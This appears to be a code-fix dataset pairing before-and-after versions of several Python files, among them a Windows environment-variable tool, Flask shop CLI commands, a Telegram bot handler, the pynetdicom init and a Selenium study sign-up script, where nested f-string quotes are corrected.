else:
an_vs = []
post_vs = []
dbrange = np.linspace(0, 70, 15)
for db in dbrange:
prot.run(args, dB=db)
prot.compute_vs()
an_vs.append(prot.an_vs["r"])
post_vs.append(prot.post_cell_vs["r"])
print(f" {'dB':3s} {'vsan':6s} {'vsbu':6s}")
for i, db in enumerate(dbrange):
print(f" {int(db):3d} {an_vs[i]:5.2f} {post_vs[i]:5.2f}")
import sys
if sys.flags.interactive == 0:
pg.QtGui.QApplication.exec_()
if __name__ == "__main__":
main()
|
################################################################################
#
# Copyright 2021-2022 Rocco Matano
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
import argparse
from ctwin32 import (
ctypes,
user,
advapi,
HWND_BROADCAST,
WM_SETTINGCHANGE,
SMTO_NORMAL,
REG_SZ,
REG_EXPAND_SZ,
KEY_READ,
KEY_WRITE,
)
################################################################################
def env_var_root(system=False, access=KEY_READ):
if system:
pth = r"SYSTEM\CurrentControlSet\Control\Session Manager"
return advapi.RegOpenKeyEx(advapi.HKLM, pth, access)
else:
return advapi.HKCU
################################################################################
def env_var_key(root, access=KEY_READ):
return advapi.RegOpenKeyEx(root, "Environment", access)
################################################################################
def is_persistent_env_var(name, system=False):
with env_var_root(system) as root:
with env_var_key(root) as key:
result = False
try:
val, typ = advapi.RegQueryValueEx(key, name)
result = (typ in (REG_SZ, REG_EXPAND_SZ)) and bool(val)
except OSError:
pass
return result
################################################################################
def broadcast_env_change():
estr = ctypes.create_unicode_buffer("Environment")
user.SendMessageTimeout(
HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
ctypes.addressof(estr),
SMTO_NORMAL,
500
)
################################################################################
def persist_env_var(name, value, system=False, do_broadcast=False):
access = KEY_WRITE | KEY_READ
with env_var_root(system, access) as root:
with env_var_key(root, access) as key:
if not value:
advapi.RegDeleteValue(key, name)
else:
advapi.reg_set_str(key, name, value)
if do_broadcast:
broadcast_env_change()
################################################################################
def persist_user_env_block(nv_dict, system=False):
for n, v in nv_dict.items():
persist_env_var(n, v, system, False)
broadcast_env_change()
################################################################################
def get_env_block(system=False):
result = {}
with env_var_root(system) as root:
with env_var_key(root, KEY_READ) as key:
for name, value, typ in advapi.reg_enum_values(key):
if typ in (REG_SZ, REG_EXPAND_SZ):
result[name] = value
return result
################################################################################
def parse_args():
ape = argparse.ArgumentParser(
description="set environment variables persistently (like setx)"
)
ape.add_argument(
"-s",
"--system",
action="store_true",
help="set system variable (as opposed to user variable)"
)
ape.add_argument(
"-v",
"--verbose",
action="store_true",
help="print final variables"
)
ape.add_argument("name", help="name of variable")
ape.add_argument(
"value",
help="value of variable (omitting it will delete the variable)",
nargs="?",
default="",
)
return ape.parse_args()
################################################################################
def main():
args = parse_args()
persist_env_var(args.name, args.value, args.system, True)
if args.verbose:
print(f"variables for {"system" if args.system else "user"}:")
for name, value in get_env_block(args.system).items():
print(f" {name} = {value}")
################################################################################
if __name__ == "__main__":
main()
################################################################################
| ################################################################################
#
# Copyright 2021-2022 Rocco Matano
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
import argparse
from ctwin32 import (
ctypes,
user,
advapi,
HWND_BROADCAST,
WM_SETTINGCHANGE,
SMTO_NORMAL,
REG_SZ,
REG_EXPAND_SZ,
KEY_READ,
KEY_WRITE,
)
################################################################################
def env_var_root(system=False, access=KEY_READ):
if system:
pth = r"SYSTEM\CurrentControlSet\Control\Session Manager"
return advapi.RegOpenKeyEx(advapi.HKLM, pth, access)
else:
return advapi.HKCU
################################################################################
def env_var_key(root, access=KEY_READ):
return advapi.RegOpenKeyEx(root, "Environment", access)
################################################################################
def is_persistent_env_var(name, system=False):
with env_var_root(system) as root:
with env_var_key(root) as key:
result = False
try:
val, typ = advapi.RegQueryValueEx(key, name)
result = (typ in (REG_SZ, REG_EXPAND_SZ)) and bool(val)
except OSError:
pass
return result
################################################################################
def broadcast_env_change():
estr = ctypes.create_unicode_buffer("Environment")
user.SendMessageTimeout(
HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
ctypes.addressof(estr),
SMTO_NORMAL,
500
)
################################################################################
def persist_env_var(name, value, system=False, do_broadcast=False):
access = KEY_WRITE | KEY_READ
with env_var_root(system, access) as root:
with env_var_key(root, access) as key:
if not value:
advapi.RegDeleteValue(key, name)
else:
advapi.reg_set_str(key, name, value)
if do_broadcast:
broadcast_env_change()
################################################################################
def persist_user_env_block(nv_dict, system=False):
for n, v in nv_dict.items():
persist_env_var(n, v, system, False)
broadcast_env_change()
################################################################################
def get_env_block(system=False):
result = {}
with env_var_root(system) as root:
with env_var_key(root, KEY_READ) as key:
for name, value, typ in advapi.reg_enum_values(key):
if typ in (REG_SZ, REG_EXPAND_SZ):
result[name] = value
return result
################################################################################
def parse_args():
ape = argparse.ArgumentParser(
description="set environment variables persistently (like setx)"
)
ape.add_argument(
"-s",
"--system",
action="store_true",
help="set system variable (as opposed to user variable)"
)
ape.add_argument(
"-v",
"--verbose",
action="store_true",
help="print final variables"
)
ape.add_argument("name", help="name of variable")
ape.add_argument(
"value",
help="value of variable (omitting it will delete the variable)",
nargs="?",
default="",
)
return ape.parse_args()
################################################################################
def main():
args = parse_args()
persist_env_var(args.name, args.value, args.system, True)
if args.verbose:
print(f"variables for {'system' if args.system else 'user'}:")
for name, value in get_env_block(args.system).items():
print(f" {name} = {value}")
################################################################################
if __name__ == "__main__":
main()
################################################################################
|
# -*- coding: utf-8 -*-
"""Click commands."""
from subprocess import call
import click
from flask import current_app
from flask.cli import with_appcontext
from werkzeug.exceptions import MethodNotAllowed, NotFound
from pathlib import Path
from itertools import chain
from flaskshop.random_data import (
create_users,
create_menus,
create_shipping_methods,
create_products_by_schema,
create_page,
create_collections_by_schema,
create_admin,
create_orders,
create_product_sales,
create_vouchers,
create_dashboard_menus,
create_roles,
)
from flaskshop.extensions import db
from flaskshop.corelib.db import rdb
from flaskshop.public.search import Item
from flaskshop.product.models import Product
HERE = Path(__file__).resolve()
PROJECT_ROOT = HERE.parent
TEST_PATH = "tests"
@click.command()
def test():
"""Run the tests."""
print(call(f"pytest {TEST_PATH}", shell=True))
@click.command()
@click.option(
"-f",
"--fix-imports",
default=False,
is_flag=True,
help="Fix imports using isort, before linting",
)
def lint(fix_imports):
"""Lint and check code style with flake8 and isort."""
skip = ["node_modules", "requirements"]
root_files = Path(PROJECT_ROOT).glob("*.py")
root_directories = (
file for file in Path(PROJECT_ROOT).iterdir() if not file.name.startswith(".")
)
files_and_directories = [
arg.name for arg in chain(root_files, root_directories) if arg.name not in skip
]
def execute_tool(description, *args):
"""Execute a checking tool with its arguments."""
command_line = list(args) + files_and_directories
click.echo(f"{description}: {" ".join(command_line)}")
rv = call(command_line)
if rv != 0:
exit(rv)
if fix_imports:
execute_tool("Fixing import order", "isort", "-rc")
execute_tool("Checking code style", "flake8")
@click.command()
def clean():
"""Remove *.pyc and *.pyo files recursively starting at current directory.
Borrowed from Flask-Script, converted to use Click.
"""
for file in chain(
Path(PROJECT_ROOT).glob("**/*.pyc"), Path(PROJECT_ROOT).glob("**/*.pyo")
):
click.echo(f"Removing {file}")
file.unlink()
@click.command()
@click.option("--url", default=None, help="Url to test (ex. /static/image.png)")
@click.option(
"--order", default="rule", help="Property on Rule to order by (default: rule)"
)
@with_appcontext
def urls(url, order):
"""Display all of the url matching routes for the project.
Borrowed from Flask-Script, converted to use Click.
"""
rows = []
column_headers = ("Rule", "Endpoint", "Arguments")
if url:
try:
rule, arguments = current_app.url_map.bind("localhost").match(
url, return_rule=True
)
rows.append((rule.rule, rule.endpoint, arguments))
column_length = 3
except (NotFound, MethodNotAllowed) as e:
rows.append((f"<{e}>", None, None))
column_length = 1
else:
rules = sorted(
current_app.url_map.iter_rules(), key=lambda rule: getattr(rule, order)
)
for rule in rules:
rows.append((rule.rule, rule.endpoint, None))
column_length = 2
str_template = ""
table_width = 0
if column_length >= 1:
max_rule_length = max(len(r[0]) for r in rows)
max_rule_length = max_rule_length if max_rule_length > 4 else 4
str_template += "{:" + str(max_rule_length) + "}"
table_width += max_rule_length
if column_length >= 2:
max_endpoint_length = max(len(str(r[1])) for r in rows)
# max_endpoint_length = max(rows, key=len)
max_endpoint_length = max_endpoint_length if max_endpoint_length > 8 else 8
str_template += " {:" + str(max_endpoint_length) + "}"
table_width += 2 + max_endpoint_length
if column_length >= 3:
max_arguments_length = max(len(str(r[2])) for r in rows)
max_arguments_length = max_arguments_length if max_arguments_length > 9 else 9
str_template += " {:" + str(max_arguments_length) + "}"
table_width += 2 + max_arguments_length
click.echo(str_template.format(*column_headers[:column_length]))
click.echo("-" * table_width)
for row in rows:
click.echo(str_template.format(*row[:column_length]))
@click.command()
@with_appcontext
def createdb():
""" create database tables
"""
db.create_all()
@click.command()
@click.option("--type", default="default", help="which type to seed")
@with_appcontext
def seed(type):
""" Generate random data for test.
"""
if type == "default":
place_holder = Path("placeholders")
create_products_by_schema(
placeholder_dir=place_holder, how_many=10, create_images=True
)
create_generator = chain(
create_collections_by_schema(place_holder),
create_users(),
create_roles(),
create_admin(),
create_page(),
create_menus(),
create_shipping_methods(),
create_dashboard_menus(),
create_orders(),
create_product_sales(),
create_vouchers(),
)
for msg in create_generator:
click.echo(msg)
elif type == "product":
place_holder = Path("placeholders")
create_products_by_schema(
placeholder_dir=place_holder, how_many=10, create_images=True
)
else:
create_dict = {
"user": create_users,
"menu": create_menus,
"ship": create_shipping_methods,
"order": create_orders,
"sale": create_product_sales,
"voucher": create_vouchers,
"dashboard": create_dashboard_menus,
"role": create_roles,
"create_admin": create_admin,
}
fn = create_dict[type]
for msg in fn():
click.echo(msg)
@click.command()
@with_appcontext
def flushrdb():
""" Clear all redis keys, include cache and propitems.
"""
rdb.flushdb()
@click.command()
@with_appcontext
def reindex():
""" clear elastic-search items.
"""
Item._index.delete(ignore=404)
Item.init()
products = Product.query.all()
Item.bulk_update(products, op_type="create")
| # -*- coding: utf-8 -*-
"""Click commands."""
from subprocess import call
import click
from flask import current_app
from flask.cli import with_appcontext
from werkzeug.exceptions import MethodNotAllowed, NotFound
from pathlib import Path
from itertools import chain
from flaskshop.random_data import (
create_users,
create_menus,
create_shipping_methods,
create_products_by_schema,
create_page,
create_collections_by_schema,
create_admin,
create_orders,
create_product_sales,
create_vouchers,
create_dashboard_menus,
create_roles,
)
from flaskshop.extensions import db
from flaskshop.corelib.db import rdb
from flaskshop.public.search import Item
from flaskshop.product.models import Product
HERE = Path(__file__).resolve()
PROJECT_ROOT = HERE.parent
TEST_PATH = "tests"
@click.command()
def test():
"""Run the tests."""
print(call(f"pytest {TEST_PATH}", shell=True))
@click.command()
@click.option(
"-f",
"--fix-imports",
default=False,
is_flag=True,
help="Fix imports using isort, before linting",
)
def lint(fix_imports):
"""Lint and check code style with flake8 and isort."""
skip = ["node_modules", "requirements"]
root_files = Path(PROJECT_ROOT).glob("*.py")
root_directories = (
file for file in Path(PROJECT_ROOT).iterdir() if not file.name.startswith(".")
)
files_and_directories = [
arg.name for arg in chain(root_files, root_directories) if arg.name not in skip
]
def execute_tool(description, *args):
"""Execute a checking tool with its arguments."""
command_line = list(args) + files_and_directories
click.echo(f"{description}: {' '.join(command_line)}")
rv = call(command_line)
if rv != 0:
exit(rv)
if fix_imports:
execute_tool("Fixing import order", "isort", "-rc")
execute_tool("Checking code style", "flake8")
@click.command()
def clean():
"""Remove *.pyc and *.pyo files recursively starting at current directory.
Borrowed from Flask-Script, converted to use Click.
"""
for file in chain(
Path(PROJECT_ROOT).glob("**/*.pyc"), Path(PROJECT_ROOT).glob("**/*.pyo")
):
click.echo(f"Removing {file}")
file.unlink()
@click.command()
@click.option("--url", default=None, help="Url to test (ex. /static/image.png)")
@click.option(
"--order", default="rule", help="Property on Rule to order by (default: rule)"
)
@with_appcontext
def urls(url, order):
"""Display all of the url matching routes for the project.
Borrowed from Flask-Script, converted to use Click.
"""
rows = []
column_headers = ("Rule", "Endpoint", "Arguments")
if url:
try:
rule, arguments = current_app.url_map.bind("localhost").match(
url, return_rule=True
)
rows.append((rule.rule, rule.endpoint, arguments))
column_length = 3
except (NotFound, MethodNotAllowed) as e:
rows.append((f"<{e}>", None, None))
column_length = 1
else:
rules = sorted(
current_app.url_map.iter_rules(), key=lambda rule: getattr(rule, order)
)
for rule in rules:
rows.append((rule.rule, rule.endpoint, None))
column_length = 2
str_template = ""
table_width = 0
if column_length >= 1:
max_rule_length = max(len(r[0]) for r in rows)
max_rule_length = max_rule_length if max_rule_length > 4 else 4
str_template += "{:" + str(max_rule_length) + "}"
table_width += max_rule_length
if column_length >= 2:
max_endpoint_length = max(len(str(r[1])) for r in rows)
# max_endpoint_length = max(rows, key=len)
max_endpoint_length = max_endpoint_length if max_endpoint_length > 8 else 8
str_template += " {:" + str(max_endpoint_length) + "}"
table_width += 2 + max_endpoint_length
if column_length >= 3:
max_arguments_length = max(len(str(r[2])) for r in rows)
max_arguments_length = max_arguments_length if max_arguments_length > 9 else 9
str_template += " {:" + str(max_arguments_length) + "}"
table_width += 2 + max_arguments_length
click.echo(str_template.format(*column_headers[:column_length]))
click.echo("-" * table_width)
for row in rows:
click.echo(str_template.format(*row[:column_length]))
@click.command()
@with_appcontext
def createdb():
""" create database tables
"""
db.create_all()
@click.command()
@click.option("--type", default="default", help="which type to seed")
@with_appcontext
def seed(type):
""" Generate random data for test.
"""
if type == "default":
place_holder = Path("placeholders")
create_products_by_schema(
placeholder_dir=place_holder, how_many=10, create_images=True
)
create_generator = chain(
create_collections_by_schema(place_holder),
create_users(),
create_roles(),
create_admin(),
create_page(),
create_menus(),
create_shipping_methods(),
create_dashboard_menus(),
create_orders(),
create_product_sales(),
create_vouchers(),
)
for msg in create_generator:
click.echo(msg)
elif type == "product":
place_holder = Path("placeholders")
create_products_by_schema(
placeholder_dir=place_holder, how_many=10, create_images=True
)
else:
create_dict = {
"user": create_users,
"menu": create_menus,
"ship": create_shipping_methods,
"order": create_orders,
"sale": create_product_sales,
"voucher": create_vouchers,
"dashboard": create_dashboard_menus,
"role": create_roles,
"create_admin": create_admin,
}
fn = create_dict[type]
for msg in fn():
click.echo(msg)
@click.command()
@with_appcontext
def flushrdb():
""" Clear all redis keys, include cache and propitems.
"""
rdb.flushdb()
@click.command()
@with_appcontext
def reindex():
""" clear elastic-search items.
"""
Item._index.delete(ignore=404)
Item.init()
products = Product.query.all()
Item.bulk_update(products, op_type="create")
|
'''Update handlers for boes_bot.'''
import os
import datetime, calendar
import locale
import json
import pymongo
import pysftp
from pymongo import MongoClient
from telegram import messages
from telegram import types
from telegram import methods
from handlers.section_handler import SectionHandler
locale.setlocale(locale.LC_ALL,"es_ES.UTF-8")
basedir = os.path.realpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
)
def create_menu_options(day, month, year, entry_count_per_section):
options = [
[{
'text': f'{section.capitalize()} ({count})',
'callback_data': f'{SectionHandler.__name__}:{year}:{month}:{day}:{section}'
}] for section, count in entry_count_per_section.items()
]
return json.dumps({'inline_keyboard': options})
class DayHandler:
collection = 'diary_summary'
def handles(self, update):
if update.type != types.CallbackQuery:
return False
if update.content['data'].startswith(self.__class__.__name__):
return True
return False
def __call__(self, update, token, dbname, dburi, sftphost, sftpuser, sftppass, sftp_cnopts=None):
year, month, day = update.content['data'].split(':')[1:]
year, month, day = int(year), int(month), int(day)
date = datetime.datetime(year, month, day)
formatted_date = '{:%Y-%m-%d}'.format(date)
client = MongoClient(dburi)
db = client[dbname]
summary = db[self.collection].find_one({'date': formatted_date})
if summary == None:
client.close()
return
formatted_link = summary["link"]\
.replace(".", "\\.")\
.replace('=', '\\=')\
.replace('-', '\\-')\
.replace('_', '\\_')
formatted_entry_types = '\n'.join(
f'◇ {c} entradas son {t}'
for t, c
in summary["per_type_def_count"].items()
if t != ''
)
caption = (
f'Boletín del día *{day} de {calendar.month_name[month].capitalize()}, {year}*\\.'
f'Accesible en {formatted_link}\\.\n\n'
f'Se registraron un total de {summary['entry_count']} entradas, de las cuales:\n'
f'{formatted_entry_types}'
)
if summary['summary_graphic']['telegram_id'] != '':
msg = messages.PhotoReplacementContent(
message_id=update.content['message']['message_id'],
reply_markup=create_menu_options(day, month, year, summary['sections']),
media={
'content': summary['summary_graphic']['telegram_id'],
'caption': caption,
'parse_mode': 'MarkdownV2',
})
msg.apply(token, update.content.cid, verbose=True)
else:
local_path = os.path.basename(summary['summary_graphic']['sftp_file'])
if not os.path.exists(local_path):
with pysftp.Connection(
sftphost,
username=sftpuser,
password=sftppass,
cnopts=sftp_cnopts) as sftp:
sftp.get(
summary['summary_graphic']['sftp_file'],
local_path)
with open(local_path, 'rb') as f:
msg = messages.PhotoReplacementContent(
message_id=update.content['message']['message_id'],
reply_markup='{}',
media={
'content': f,
'caption': caption,
'parse_mode': 'MarkdownV2',
'reply_markup': create_menu_options(day, month, year, summary['sections'])
})
status, res = msg.apply(token, update.content.cid, verbose=True)
if status == 200 and res['ok'] == True:
photo, thumbnail = res['result']['photo'][-2:]
photo_id = photo['file_id']
result = db[self.collection].update_one(
{'date': formatted_date},
{'$set': {'summary_graphic.telegram_id': photo_id}}
)
client.close()
if result.modified_count == 1:
os.remove(local_path)
| '''Update handlers for boes_bot.'''
import os
import datetime, calendar
import locale
import json
import pymongo
import pysftp
from pymongo import MongoClient
from telegram import messages
from telegram import types
from telegram import methods
from handlers.section_handler import SectionHandler
locale.setlocale(locale.LC_ALL,"es_ES.UTF-8")
basedir = os.path.realpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
)
def create_menu_options(day, month, year, entry_count_per_section):
options = [
[{
'text': f'{section.capitalize()} ({count})',
'callback_data': f'{SectionHandler.__name__}:{year}:{month}:{day}:{section}'
}] for section, count in entry_count_per_section.items()
]
return json.dumps({'inline_keyboard': options})
class DayHandler:
collection = 'diary_summary'
def handles(self, update):
if update.type != types.CallbackQuery:
return False
if update.content['data'].startswith(self.__class__.__name__):
return True
return False
def __call__(self, update, token, dbname, dburi, sftphost, sftpuser, sftppass, sftp_cnopts=None):
year, month, day = update.content['data'].split(':')[1:]
year, month, day = int(year), int(month), int(day)
date = datetime.datetime(year, month, day)
formatted_date = '{:%Y-%m-%d}'.format(date)
client = MongoClient(dburi)
db = client[dbname]
summary = db[self.collection].find_one({'date': formatted_date})
if summary == None:
client.close()
return
formatted_link = summary["link"]\
.replace(".", "\\.")\
.replace('=', '\\=')\
.replace('-', '\\-')\
.replace('_', '\\_')
formatted_entry_types = '\n'.join(
f'◇ {c} entradas son {t}'
for t, c
in summary["per_type_def_count"].items()
if t != ''
)
caption = (
f'Boletín del día *{day} de {calendar.month_name[month].capitalize()}, {year}*\\.'
f'Accesible en {formatted_link}\\.\n\n'
f'Se registraron un total de {summary["entry_count"]} entradas, de las cuales:\n'
f'{formatted_entry_types}'
)
if summary['summary_graphic']['telegram_id'] != '':
msg = messages.PhotoReplacementContent(
message_id=update.content['message']['message_id'],
reply_markup=create_menu_options(day, month, year, summary['sections']),
media={
'content': summary['summary_graphic']['telegram_id'],
'caption': caption,
'parse_mode': 'MarkdownV2',
})
msg.apply(token, update.content.cid, verbose=True)
else:
local_path = os.path.basename(summary['summary_graphic']['sftp_file'])
if not os.path.exists(local_path):
with pysftp.Connection(
sftphost,
username=sftpuser,
password=sftppass,
cnopts=sftp_cnopts) as sftp:
sftp.get(
summary['summary_graphic']['sftp_file'],
local_path)
with open(local_path, 'rb') as f:
msg = messages.PhotoReplacementContent(
message_id=update.content['message']['message_id'],
reply_markup='{}',
media={
'content': f,
'caption': caption,
'parse_mode': 'MarkdownV2',
'reply_markup': create_menu_options(day, month, year, summary['sections'])
})
status, res = msg.apply(token, update.content.cid, verbose=True)
if status == 200 and res['ok'] == True:
photo, thumbnail = res['result']['photo'][-2:]
photo_id = photo['file_id']
result = db[self.collection].update_one(
{'date': formatted_date},
{'$set': {'summary_graphic.telegram_id': photo_id}}
)
client.close()
if result.modified_count == 1:
os.remove(local_path)
|
"""Set module shortcuts and globals"""
import logging
from pydicom.uid import UID
from ._version import __version__
_version = __version__.split(".")[:3]
# UID prefix provided by https://www.medicalconnections.co.uk/Free_UID
# Encoded as UI, maximum 64 characters
PYNETDICOM_UID_PREFIX = "1.2.826.0.1.3680043.9.3811."
"""``1.2.826.0.1.3680043.9.3811.``
The UID root used by *pynetdicom*.
"""
# Encoded as SH, maximum 16 characters
PYNETDICOM_IMPLEMENTATION_VERSION: str = f"PYNETDICOM_{"".join(_version)}"
"""The (0002,0013) *Implementation Version Name* used by *pynetdicom*"""
assert 1 <= len(PYNETDICOM_IMPLEMENTATION_VERSION) <= 16
PYNETDICOM_IMPLEMENTATION_UID: UID = UID(f"{PYNETDICOM_UID_PREFIX}{".".join(_version)}")
"""The (0002,0012) *Implementation Class UID* used by *pynetdicom*"""
assert PYNETDICOM_IMPLEMENTATION_UID.is_valid
# Convenience imports
from pynetdicom import events as evt
from pynetdicom.ae import ApplicationEntity as AE
from pynetdicom.association import Association
from pynetdicom._globals import (
ALL_TRANSFER_SYNTAXES,
DEFAULT_TRANSFER_SYNTAXES,
)
from pynetdicom.presentation import (
build_context,
build_role,
AllStoragePresentationContexts,
ApplicationEventLoggingPresentationContexts,
BasicWorklistManagementPresentationContexts,
ColorPalettePresentationContexts,
DefinedProcedureProtocolPresentationContexts,
DisplaySystemPresentationContexts,
HangingProtocolPresentationContexts,
ImplantTemplatePresentationContexts,
InstanceAvailabilityPresentationContexts,
MediaCreationManagementPresentationContexts,
MediaStoragePresentationContexts,
ModalityPerformedPresentationContexts,
NonPatientObjectPresentationContexts,
PrintManagementPresentationContexts,
ProcedureStepPresentationContexts,
ProtocolApprovalPresentationContexts,
QueryRetrievePresentationContexts,
RelevantPatientInformationPresentationContexts,
RTMachineVerificationPresentationContexts,
StoragePresentationContexts,
StorageCommitmentPresentationContexts,
SubstanceAdministrationPresentationContexts,
UnifiedProcedurePresentationContexts,
VerificationPresentationContexts,
)
# Setup default logging
logging.getLogger("pynetdicom").addHandler(logging.NullHandler())
def debug_logger() -> None:
"""Setup the logging for debugging."""
logger = logging.getLogger("pynetdicom")
# Ensure only have one StreamHandler
logger.handlers = []
handler = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(levelname).1s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
| """Set module shortcuts and globals"""
import logging
from pydicom.uid import UID
from ._version import __version__
_version = __version__.split(".")[:3]
# UID prefix provided by https://www.medicalconnections.co.uk/Free_UID
# Encoded as UI, maximum 64 characters
PYNETDICOM_UID_PREFIX = "1.2.826.0.1.3680043.9.3811."
"""``1.2.826.0.1.3680043.9.3811.``
The UID root used by *pynetdicom*.
"""
# Encoded as SH, maximum 16 characters
PYNETDICOM_IMPLEMENTATION_VERSION: str = f"PYNETDICOM_{''.join(_version)}"
"""The (0002,0013) *Implementation Version Name* used by *pynetdicom*"""
assert 1 <= len(PYNETDICOM_IMPLEMENTATION_VERSION) <= 16
PYNETDICOM_IMPLEMENTATION_UID: UID = UID(f"{PYNETDICOM_UID_PREFIX}{'.'.join(_version)}")
"""The (0002,0012) *Implementation Class UID* used by *pynetdicom*"""
assert PYNETDICOM_IMPLEMENTATION_UID.is_valid
# Convenience imports
from pynetdicom import events as evt
from pynetdicom.ae import ApplicationEntity as AE
from pynetdicom.association import Association
from pynetdicom._globals import (
ALL_TRANSFER_SYNTAXES,
DEFAULT_TRANSFER_SYNTAXES,
)
from pynetdicom.presentation import (
build_context,
build_role,
AllStoragePresentationContexts,
ApplicationEventLoggingPresentationContexts,
BasicWorklistManagementPresentationContexts,
ColorPalettePresentationContexts,
DefinedProcedureProtocolPresentationContexts,
DisplaySystemPresentationContexts,
HangingProtocolPresentationContexts,
ImplantTemplatePresentationContexts,
InstanceAvailabilityPresentationContexts,
MediaCreationManagementPresentationContexts,
MediaStoragePresentationContexts,
ModalityPerformedPresentationContexts,
NonPatientObjectPresentationContexts,
PrintManagementPresentationContexts,
ProcedureStepPresentationContexts,
ProtocolApprovalPresentationContexts,
QueryRetrievePresentationContexts,
RelevantPatientInformationPresentationContexts,
RTMachineVerificationPresentationContexts,
StoragePresentationContexts,
StorageCommitmentPresentationContexts,
SubstanceAdministrationPresentationContexts,
UnifiedProcedurePresentationContexts,
VerificationPresentationContexts,
)
# Setup default logging
logging.getLogger("pynetdicom").addHandler(logging.NullHandler())
def debug_logger() -> None:
"""Setup the logging for debugging."""
logger = logging.getLogger("pynetdicom")
# Ensure only have one StreamHandler
logger.handlers = []
handler = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(levelname).1s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
|
# %%
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options # for suppressing the browser
from selenium import webdriver
import warnings
from bs4 import BeautifulSoup as bs
import webbrowser
from webdriver_manager.chrome import ChromeDriverManager
options = Options()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument("--headless")
with warnings.catch_warnings():
warnings.simplefilter('ignore')
driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
# remove the options argument if u wanna see the browser open and perform the automated process
# %%
url = 'https://ucalgary.sona-systems.com'
user_ID = '<insert User ID here>'
password = '<insert Password here>'
driver.get(url)
driver.find_element(
By.ID, "ctl00_ContentPlaceHolder1_userid").send_keys(user_ID)
driver.find_element(By.ID, "pw").send_keys(password)
element = driver.find_element(
By.ID, "ctl00_ContentPlaceHolder1_default_auth_button")
driver.execute_script("arguments[0].click();", element)
WebDriverWait(driver, 10).until(EC.presence_of_element_located(
(By.ID, "lnkStudySignupLink"))).click()
# %%
html = driver.page_source
home_page = 'https://ucalgary.sona-systems.com/'
soup = bs(html, 'html.parser')
table_row = soup.find('tr').parent.findNextSibling()
study_links = table_row.findAll('a')
links = set()
for link in study_links:
links.add(f'{home_page}{link.get('href')}')
num_of_links = len(links)
if num_of_links == 0:
driver.close()
exit('\nThere are no studies available currently, see u later!')
print(f'\nthere is {num_of_links} available study') if num_of_links == 1 else print(
f'\nthere are {num_of_links} available studies')
# %%
for link in links:
driver.get(link)
already_completed = 0
link = driver.page_source
soup2 = bs(link, 'html.parser')
if len(driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lnkNonAdmin')) == 1:
description = soup2.find(
'span', {'id': 'ctl00_ContentPlaceHolder1_lblLongDesc'}).get_text(' ')
print(description)
if input("\nIf u wanna participate in this study, press Enter, if not, type any letter then press Enter and you will see the next avalable if there is any other") == '':
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_lnkNonAdmin').click()
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_repTimeSlots_ctl00_Submit_Button').click()
driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_Submit_Button').click()
if driver.find_element(By.ID, 'ctl00_SystemMessageLabel').text == 'Sign-up Successful':
if input('\nYou got signed up!, press Enter if u wanna start the research study, otherwise, type any letter then press Enter') == '':
if driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lnkWebsite').get_attribute('href') != 0:
study_link = driver.find_element(
By.ID, 'ctl00_ContentPlaceHolder1_lnkWebsite').get_attribute('href')
driver.close()
else:
driver.close()
exit('Seems like the study is not online, if the study is actually online and you got this message please contact me so I can fix this problem')
print('\nEnjoy!')
webbrowser.open(study_link)
else:
print(
'\nYou should recieve an email anytime now with the research link, have a woderful day')
else:
print(
"Either there's a problem with the code or the sign up was unsucessful, probably the former lol, plz lmk if u got this error")
elif len(driver.find_elements(By.ID, 'ctl00_ContentPlaceHolder1_lblNonAdmin')) == 1:
already_completed += 1
driver.close()
if already_completed > 0:
print('You have already completed all of the studies available') if already_completed == num_of_links else print(
f'You have already completed {already_completed} of the studies available')
| # %%
